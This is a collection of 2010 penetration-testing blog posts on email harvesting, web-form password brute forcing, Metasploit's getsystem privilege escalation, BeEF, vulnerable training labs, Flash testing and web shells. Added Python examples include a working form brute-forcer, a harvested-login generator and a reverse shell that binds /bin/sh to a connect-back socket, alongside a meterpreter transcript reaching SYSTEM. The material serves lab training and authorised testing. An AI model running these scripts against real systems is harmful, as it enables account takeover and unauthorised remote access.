Quickly gathering logins/emails with theHarvester and Metasploit
Posted by Jhaddix in Uncategorized on March 7th, 2010
Like GI Joe always said: knowing is half the battle… and so it is with hacking.
One of the first parts of recon in a pentest is gathering valid login names and emails. We can use these to profile our target, bruteforce authentication systems, send client-side attacks (through phishing), look through social networks for juicy info on platforms and technologies, etc.
Where do we get this info? Without doing a full-blown Open Source Intelligence (OSINT) style assessment, we can use two simple scripts: Metasploit's search_email_collector.rb and Edge-Security's theHarvester.
theHarvester (luckily for us) just updated to v1.5 and has fixed some of its previous bugs with searching Bing and LinkedIn. It supports searching Google, Bing, PGP key servers, and LinkedIn. Metasploit's search_email_collector.rb, under modules/auxiliary/gather, uses similar techniques against Google, Bing, and Yahoo.
A quick usage below identifies some users
P.S. you can run search_email_collector as a one-liner with msfcli:
ruby /framework3/msfcli auxiliary/gather/search_email_collector DOMAIN=your_target_domain OUTFILE=output_file_you_want_results_in E
Check the last line for an example wrapper for these two tools.
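A wrapper of the kind mentioned above, added here as an example rather than the page's own script: it merges whatever theHarvester printed and whatever search_email_collector wrote to its OUTFILE, drops the noise from other domains, dedupes, and turns the survivors into login candidates plus a guess at the naming convention. Both tool outputs below are constructed samples; their exact formats are assumptions, which is why the addresses are pulled out with a regex instead of parsed line by line.

```python
"""Merge the harvests from theHarvester and Metasploit's search_email_collector
into one deduplicated address list, then derive login candidates and a guess at
the target's naming convention.

Added example for this post, not code from either tool. Both inputs are
constructed samples of what the tools print or write to OUTFILE; the exact
formats are assumed, which is why addresses are regex-extracted rather than
parsed line by line.
"""
import re
from collections import Counter

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# Role mailboxes that say nothing about how employee logins are formed.
ROLE_ACCOUNTS = {"webmaster", "postmaster", "press", "info", "admin",
                 "sales", "support", "noreply", "no-reply"}

# Constructed sample: console output from theHarvester (format assumed).
THEHARVESTER_OUT = """\
*TheHarvester Ver. 1.5*
Searching for example.com in google ..
Accounts found:
====================
jsmith@example.com
Jane.Doe@example.com
webmaster@EXAMPLE.COM
press@sub.example.com
bob@unrelated.org
"""

# Constructed sample: search_email_collector OUTFILE, one address per line (assumed).
MSF_OUT = """\
jsmith@example.com
jane.doe@example.com
a.jones@example.com
"""


def extract_emails(text, domain):
    """Pull every address out of free-form tool output, lowercase it and keep
    only the target domain and its subdomains (the hosting provider's and
    other people's addresses routinely leak into search results)."""
    domain = domain.lower()
    keep = set()
    for match in EMAIL_RE.finditer(text):
        addr = match.group(0).lower()
        host = addr.rsplit("@", 1)[1]
        if host == domain or host.endswith("." + domain):
            keep.add(addr)
    return keep


def merge_harvests(domain, *tool_outputs):
    """Union of the addresses from every tool, sorted so runs can be diffed."""
    emails = set()
    for out in tool_outputs:
        emails |= extract_emails(out, domain)
    return sorted(emails)


def login_candidates(emails):
    """The local part is the usual first guess at the login name."""
    return sorted({addr.split("@", 1)[0] for addr in emails})


def naming_convention(emails):
    """Heuristic: do employee addresses look like first.last or flast?
    Knowing this lets you mint logins for names found on LinkedIn."""
    votes = Counter()
    for addr in emails:
        local = addr.split("@", 1)[0]
        if local in ROLE_ACCOUNTS:
            continue
        if "." in local:
            votes["first.last"] += 1
        elif re.fullmatch(r"[a-z]{4,}", local):
            votes["flast"] += 1
    return votes.most_common(1)[0][0] if votes else "unknown"


if __name__ == "__main__":
    merged = merge_harvests("example.com", THEHARVESTER_OUT, MSF_OUT)
    print("\n".join(merged))
    print("logins:", ", ".join(login_candidates(merged)))
    print("convention:", naming_convention(merged))
```

Feed the real files in with `open(...).read()` in place of the two constructed strings; the domain filter matters because search engine results drag in the hosting provider's and partners' addresses, and a brute-force run against a login that does not exist only adds noise to the target's logs.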
Easy, breezy, beautiful, password attacking…
Posted by Jhaddix in Uncategorized on March 6th, 2010
Bruting web forms is usually part of a web app assessment. We love Hydra, Medusa, or Wfuzz for this, but we recently stumbled across a tool that makes it much easier: Fireforce, a Firefox extension that gives you point-and-click bruting.
We ran it in our labs with about a 74% success rate, meaning it mapped the parameters for web form logins correctly and gave us the correct password back (aka it didn't spaz out and kill our browser). So it isn't perfect, but we're willing to forgive that for its ease of use. It's dead simple: give it a username, right-click in the form's password field, give it the text the login form returns on an unsuccessful login, and a brute-force list. Make sure to read the documentation, as you'll need a separate Firefox profile if you wish to keep browsing while using the tool (it's a memory/CPU hog). *note* We haven't done a code analysis on the extension; use at your own risk in your lab.
Also, yesterday we tweeted about Ron Bowes of Skullsecurity.com's password analysis and password list collection, which are much win. Ron has done some data analysis on the leaked password lists of the last few years, like RockYou, MySpace, and phpBB. He also stores the default password lists of many common industry tools, and even the passwords Conficker used to spread. I'd grab these lists if you don't already have them; who knows how long they will stay up. Ron has actually been on a hot streak lately, as he has released an awesome tool called dnscat. He also did some VMware guest-stealing NSE scripts which we will post on later.
Remember, password brute-forcing is great as long as you don't DoS the application/server. Also remember that just because it's a web form doesn't mean it's not tied to another backend system (LDAP, etc.), so be aware you could lock out users.
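What Fireforce does with a right-click, as a script added here (not Fireforce's own code): submit the form once per candidate password, call it a hit when the failure text the form shows on a bad login is absent from the response, and bail out as soon as the replies start looking like a lockout instead of burning through the rest of the list. The HTTP layer is a callable you pass in; FakeLoginForm is a constructed stand-in for a form backed by something like LDAP that locks the account after a few failures, so the lockout caveat above can be shown offline. http_poster builds the real poster for a lab target, with the URL and field names as assumptions you read off the actual form.

```python
"""Fireforce, scripted: submit the login form once per candidate password,
treat the absence of the failure text as success, and stop on lockout.

Added example for this post, not Fireforce's own code. FakeLoginForm is a
constructed target; http_poster's URL and field names are assumptions to be
read off the real form.
"""
import urllib.parse
import urllib.request

FAILURE_TEXT = "Invalid username or password"   # what the form says on a bad login
LOCKOUT_TEXT = "Account locked"                 # what it says once the backend locks you out


def http_poster(url, user_field="username", pass_field="password"):
    """Return submit(username, password) -> response body, POSTing a real form."""
    def submit(username, password):
        data = urllib.parse.urlencode({user_field: username,
                                       pass_field: password}).encode()
        with urllib.request.urlopen(url, data=data, timeout=10) as resp:
            return resp.read().decode(errors="replace")
    return submit


def brute_form(submit, username, wordlist, failure_text=FAILURE_TEXT,
               lockout_text=LOCKOUT_TEXT, max_attempts=None):
    """Returns (password, attempts, status) with status one of 'found',
    'locked', 'budget' or 'exhausted'. max_attempts is the knob for the
    warning in the post: keep it below the backend's lockout threshold."""
    attempts = 0
    for password in wordlist:
        if max_attempts is not None and attempts >= max_attempts:
            return None, attempts, "budget"
        body = submit(username, password)
        attempts += 1
        if lockout_text in body:
            # Every further guess is wasted and may lock other accounts too.
            return None, attempts, "locked"
        if failure_text not in body:
            return password, attempts, "found"
    return None, attempts, "exhausted"


class FakeLoginForm:
    """Constructed target: one valid credential pair, N-strike lockout."""

    def __init__(self, valid_user, valid_password, lockout_after=5):
        self.valid = (valid_user, valid_password)
        self.lockout_after = lockout_after
        self.failures = {}

    def submit(self, username, password):
        if self.failures.get(username, 0) >= self.lockout_after:
            return "<p>Account locked, contact the helpdesk</p>"
        if (username, password) == self.valid:
            return "<h1>Welcome back, %s</h1>" % username
        self.failures[username] = self.failures.get(username, 0) + 1
        return "<p>Invalid username or password</p>"


if __name__ == "__main__":
    words = ["password", "123456", "letmein", "qwerty", "monkey", "dragon"]
    target = FakeLoginForm("admin", "letmein")
    print(brute_form(target.submit, "admin", words))            # ('letmein', 3, 'found')
    locked = FakeLoginForm("bob", "correct-horse", lockout_after=3)
    print(brute_form(locked.submit, "bob", words))              # (None, 4, 'locked')
    capped = FakeLoginForm("bob", "correct-horse", lockout_after=3)
    print(brute_form(capped.submit, "bob", words, max_attempts=2))  # (None, 2, 'budget')
```

"Failure text absent" is the same success test Fireforce uses, which is also why it misfires: a 500 page or a rate-limit page lacks the failure string too, so confirm any hit by hand before reporting it, and set max_attempts from the lockout policy you learned during recon rather than guessing.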
Also you might wanna check out our writeup a bit back on password attacks here.
Get Fireforce Here
Get Password Lists Here
Get DNScat Here
Catch Ron on twitter: @iagox86
Profit…
Getsystem, Privilege Escalation via Metasploit
Posted by Jhaddix in Uncategorized on February 18th, 2010
A few weeks ago Chris Gates (of Attack Research / Carnal Ownage) and Joshua Gauthier showed some quick snippets of Metasploit's Getsystem. Getsystem is the new (Windows) privilege escalation command in Meterpreter's priv extension.
Getsystem uses several techniques for priv escalation:
- Windows Impersonation Tokens (fixed by MS09-012)
- Abusing LSASS via token passing (Pass-the-Hash) which requires Administrator anyway.
- Exploiting weak permissions (read and write) in the services (most of them by default run as SYSTEM, if you are lucky they run as a domain administrator).
- Improved KiTrap0D exploit released by Tavis Ormandy ( MS10-015 patched as of now)
As more privilege escalation exploits appear this year they will no doubt be rolled into Getsystem, which I will be keeping a watchful eye on. Thanks to Stephen Fewer for adding the new functionality to Getsystem.
Also, check out Bernardo Damele’s (author of SQLmap!) walkthrough on integrating Metasploit privilege escalation via SQLmap for post database exploitation. Here.
And a sample of KiTrap0D integrated into Metasploit 3.3.4-DEV, from Pieter Danhieux: the getsystem help lists it as technique 4, though the run shown below elevates via technique 1, named pipe impersonation:
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t The technique to use. (Default to '0').
0 : All techniques available
1 : Service - Named Pipe Impersonation (In Memory/Admin)
2 : Service - Named Pipe Impersonation (Dropper/Admin)
3 : Service - Token Duplication (In Memory/Admin)
4 : Exploit - KiTrap0D (In Memory/User)
meterpreter > getsystem -t 1
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Medusa 2.0: She wears so many hats…
Posted by Jhaddix in Uncategorized on February 18th, 2010
On the heels of our post about Ncrack, Nmap's new password brute-forcer, the foofus group had to go and update Medusa!
Medusa, which has been our go-to tool for years, is now 2.0! This is its first major release in two years, and it has a multitude of useful changes:
- Pool-based thread handling
- Modules now request next credential set
- Secondary user credential queue added for missed login tests
- Host- and user-level resume
- Multiple module fixes
It's not like pentesters have never had multiple tools to do the same thing; in fact we like both Ncrack and Medusa (and at this time Medusa supports far more protocols/services).
Check out the changes here
The usage here
and download it here
BeEF, Browser Rider, and XSSTunnel make friends…
Posted by Jhaddix in Uncategorized on February 13th, 2010
About 7 days ago Wade Alcorn announced that Benjamin Mosse, developer of the other popular browser attack tool, Browser Rider, would be involved in an initiative to roll Browser Rider into BeEF.
This is big news.
BeEF and Browser Rider have long been somewhat of rivals, and a joint effort by two brilliant devs for more browser hackery should give you that warm fuzzy feeling like when you watch A Charlie Brown Christmas.
If that wasn't enough, today Wade announced that Ferruh Mavituna would be joining the dev team. Is that the same Ferruh Mavituna who wrote one of the more popular SQL injection cheat sheets? The same guy we just interviewed about the new web-app scanner Netsparker (which we around the office affectionately refer to as "the sparkler")?
Indeed it is. He will be actively rolling XSSTunnel and XSSShell into BeEF.
Ferruh joins Wade, Benjamin, and more of our favorite BeEF Devs (Jabra and Ryan Linn) in making browser based attacks easy to perform, extensible, and just plain bad-ass.
Download BeEF Here
Check out John Strand’s Intro to BeEF Video Here and Here
And check out Ryan’s BeEF Exploitation Videos Here
And check out Jabra’s Metasploit and BeEF mashup videos Here
Don’t make the Cow angry…
More and More Webapp Labs!
So… since the writing of our webapp lab article a lot of people have put together similar projects. We like ours, but we wouldn't be objective if we didn't report on some other options.
The big news is the OWASP Broken Web Applications Project. This project is a nice *tidy* little VM you can spin up to train yourself in web-app pentesting ninja-ry.
The owaspbwa project includes applications from various sources (listed in no particular order).
Intentionally Vulnerable Applications:
- OWASP WebGoat version 5.3-SNAPSHOT (Java)
- OWASP Vicnum version 1.3 (Perl)
- Mutillidae version 1.3 (PHP)
- Damn Vulnerable Web Application version 1.06 (PHP)
- OWASP CSRFGuard Test Application version 2.2 (Java)
- Mandiant Struts Forms (Java/Struts)
- Simple ASP.NET Forms (ASP.NET/C#)
- Simple Form with DOM Cross Site Scripting (HTML/JavaScript)
And old Versions of Real Applications:
- WordPress 2.0.0 (PHP, released December 31, 2005, downloaded from www.oldapps.com)
- phpBB 2.0.0 (PHP, released April 4, 2002, downloaded from www.oldapps.com)
- Yazd version 1.0 (Java, released February 20, 2002)
Web Security Dojo, the second project, is actually very similar. It features not only targets but also tools to test against the targets, all in a VM for easy deployment.
- OWASP’s WebGoat v5.2
- Damn Vulnerable Web App v1.0.6
- Hacme Casino v1.0
- OWASP InsecureWebApp v1.0
- simple training targets by Maven Security (including REST and JSON)
- Burp Suite (free version) v1.3
- w3af cvs version
- OWASP Skavenger v0.6.2a
- OWASP Dirbuster v1.0 RC1
- Paros v3.2.13
- Webscarab v20070504-1631
- Ratproxy v1.57-beta
- sqlmap v0.7
- helpful Firefox add-ons
Both further the goal of raising awareness of web app flaws and breeding well trained security ninjas… we approve =)
Testing Flash Applications
Posted by Jhaddix in penetration testing on February 7th, 2010
SaaS penetration testing is a model I can't get behind, but that doesn't mean the people behind the product don't have good ideas. A few days ago this company put out a pretty decent guideline article on testing Flash applications called "A Lazy Pen Tester's Guide to Testing Flash Applications".
It outlines the general categories of vulns we should be looking for in Flash apps:
* Cross Site Scripting
* Malicious Data Injection
* Insufficient Authorization Restrictions
* Secure Transmission
* SWF Information Leak
* Minimum Stage Size for Anti-ClickJacking
* SWF Control Permission
* Untrusted SWF in Same Domain
* Clickjacking
* Privilege Separation
* Cross Domain Policy Audit
* Uninitialized Variable Scanning
* Remote Method Enumeration
* Business Logic Testing
I like it. Check it out.
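One of the items on that list, the cross domain policy audit, is mechanical enough to script. The following is an added example, not code from the linked guide: it parses a crossdomain.xml and flags the settings that let SWFs from other origins read this site's responses with the victim's cookies attached. Both policy files are constructed samples; point the function at the /crossdomain.xml you actually fetched from the target.

```python
"""Cross Domain Policy Audit from the checklist above, as a script: parse a
crossdomain.xml and flag the settings that let SWFs from other origins read
this site's responses with the victim's session attached.

Added example for this post, not code from the linked guide. Both policy
files are constructed samples.
"""
import xml.etree.ElementTree as ET

# Constructed: the kind of policy a developer writes to make the error go away.
PERMISSIVE = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
"""

# Constructed: a tightened policy that still serves a CDN subdomain.
RESTRICTED = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="www.example.com"/>
  <allow-access-from domain="*.cdn.example.com" secure="true"/>
  <allow-http-request-headers-from domain="www.example.com" headers="SOAPAction"/>
</cross-domain-policy>
"""


def audit_crossdomain(xml_text):
    """Return a list of (severity, message) findings, in document order."""
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return [("high", "root element is %s, not cross-domain-policy" % root.tag)]
    findings = []

    control = root.find("site-control")
    if control is not None and control.get("permitted-cross-domain-policies") == "all":
        findings.append(("medium", "site-control allows policy files anywhere on the host, "
                                   "so any user-uploaded XML can widen access"))

    for rule in root.findall("allow-access-from"):
        domain = rule.get("domain", "")
        if domain == "*":
            findings.append(("high", "allow-access-from domain=\"*\": any site's SWF can read "
                                     "responses with the victim's session"))
        elif domain.startswith("*."):
            findings.append(("low", "allow-access-from %s: every host under that suffix is trusted" % domain))
        # secure defaults to true when the policy is served over HTTPS; an explicit
        # false lets plain-HTTP SWFs talk to the HTTPS origin.
        if rule.get("secure", "true").lower() == "false":
            findings.append(("medium", "allow-access-from %s secure=\"false\": HTTP-loaded SWFs may "
                                       "reach this HTTPS origin" % (domain or "(no domain)")))

    for rule in root.findall("allow-http-request-headers-from"):
        if rule.get("domain") == "*" and rule.get("headers") == "*":
            findings.append(("medium", "allow-http-request-headers-from domain=\"*\" headers=\"*\": "
                                       "any origin can send arbitrary request headers"))
    return findings


def worst_severity(findings):
    """Collapse a finding list to the single rating you put in the report."""
    order = {"high": 3, "medium": 2, "low": 1}
    return max((f[0] for f in findings), key=order.get, default="none")


if __name__ == "__main__":
    for name, policy in (("permissive", PERMISSIVE), ("restricted", RESTRICTED)):
        print(name, worst_severity(audit_crossdomain(policy)))
        for severity, message in audit_crossdomain(policy):
            print("  [%s] %s" % (severity, message))
```

The wildcard domain is the finding that matters: a SWF hosted anywhere can then make the victim's browser fetch authenticated pages from the site and read them, which is the Flash-side equivalent of a CSRF that also returns the response. The subdomain wildcard is only low because it is as strong as the weakest host under that suffix, so check what else lives there.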
For whom the Shell tolls…
Catchy title, don't you think?
Web shells are an excellent way to make use of a misconfigured web server, whether you got the shell there through SQL injection, an upload script, WebDAV, an open PUT method, etc. We can all appreciate command line administration through the web browser! Even better, because a web shell runs as the web server itself, it often gives us access to parts of the server that would stay off limits even if we cracked SSH, FTP, etc.
So, where's the good stuff, you ask?
We start by featuring Evil1’s paper on web shells. “The paper covers web shells in PHP, ASP, JSP, Coldfusion, and Perl as well as hacking techniques for auditing each language (brief, but to the point).”
Evil1’s paper gives us some common blackhat shells to use. These are great and they have some magic built in to them but, they don’t always fit our scope.
If only we had a project that took all the great features of these shells and cleaned them up for pentesters… oh wait, we do!
Laudanum, a Kevin Johnson (of InGuardians) project, provides these shells for pentesters. They have most of the built-in privilege magic that the common c99 and r57 shells have, and some come with built-in authentication so malicious users can't just pop by and use our shells.
If you skip reading the paper by Evil1, which I don't suggest, he highlights the awesome pentestmonkey reverse PHP shell, which pushes a shell out over an egress connection that we catch with netcat. Pure awesome.
PHP, JSP, CFM, ASP, Perl, etc.: between these two resources we can control most platforms in an easy and flexible way.
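The mechanism behind that reverse shell, shown end to end on the loopback interface as an added example (not pentestmonkey's or Laudanum's code): catch_shell plays the part of `nc -l -p PORT`, and connect_back is the payload side, dialling out and wiring /bin/sh's stdin, stdout and stderr to the socket so the egress connection is the shell, the same descriptor trick the PHP version does with proc_open. It only talks to itself on 127.0.0.1 and needs /bin/sh, so it is Unix-only; run the connect_back half against a listener you own, in a lab.

```python
"""Reverse shell on loopback: a netcat-style catcher plus a connect-back that
binds /bin/sh to the socket, demonstrating what the reverse PHP shell does.

Added example for this post, not pentestmonkey's or Laudanum's code.
Unix-only (needs /bin/sh); talks only to itself on 127.0.0.1.
"""
import socket
import subprocess
import threading


def connect_back(host, port):
    """Payload side: connect out, hand the socket to a shell, wait for it."""
    sock = socket.create_connection((host, port), timeout=10)
    # The timeout left the fd non-blocking; the child shell needs blocking I/O.
    sock.setblocking(True)
    fd = sock.fileno()
    # Same trick as the PHP shell's proc_open descriptor spec: the shell never
    # sees a terminal, it reads commands from and writes results to the socket.
    proc = subprocess.Popen(["/bin/sh"], stdin=fd, stdout=fd, stderr=fd)
    proc.wait()
    sock.close()


def catch_shell(server, commands):
    """Catcher side: accept one connection, feed it the commands, return what
    came back. 'exit' is appended so the shell ends and the socket closes."""
    conn, _ = server.accept()
    conn.settimeout(10)
    with conn:
        script = "".join(cmd + "\n" for cmd in commands) + "exit\n"
        conn.sendall(script.encode())
        chunks = []
        try:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return b"".join(chunks).decode(errors="replace")


def loopback_demo(commands):
    """Stand up the listener, fire the connect-back in a thread, collect output."""
    server = socket.socket()
    server.bind(("127.0.0.1", 0))          # ephemeral port, no clash with a real nc
    server.listen(1)
    port = server.getsockname()[1]
    payload = threading.Thread(target=connect_back, args=("127.0.0.1", port))
    payload.start()
    try:
        return catch_shell(server, commands)
    finally:
        payload.join(15)
        server.close()


if __name__ == "__main__":
    print(loopback_demo(["echo hello from the shell", "pwd"]))
```

Everything crosses the wire in the clear and the listener takes the first connection it gets, which is why Laudanum's authenticated shells and a firewall rule on your catch box are worth the extra minute on a real engagement.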
Greetz to all those at Shmoo! Get me a damn t-shirt will ya!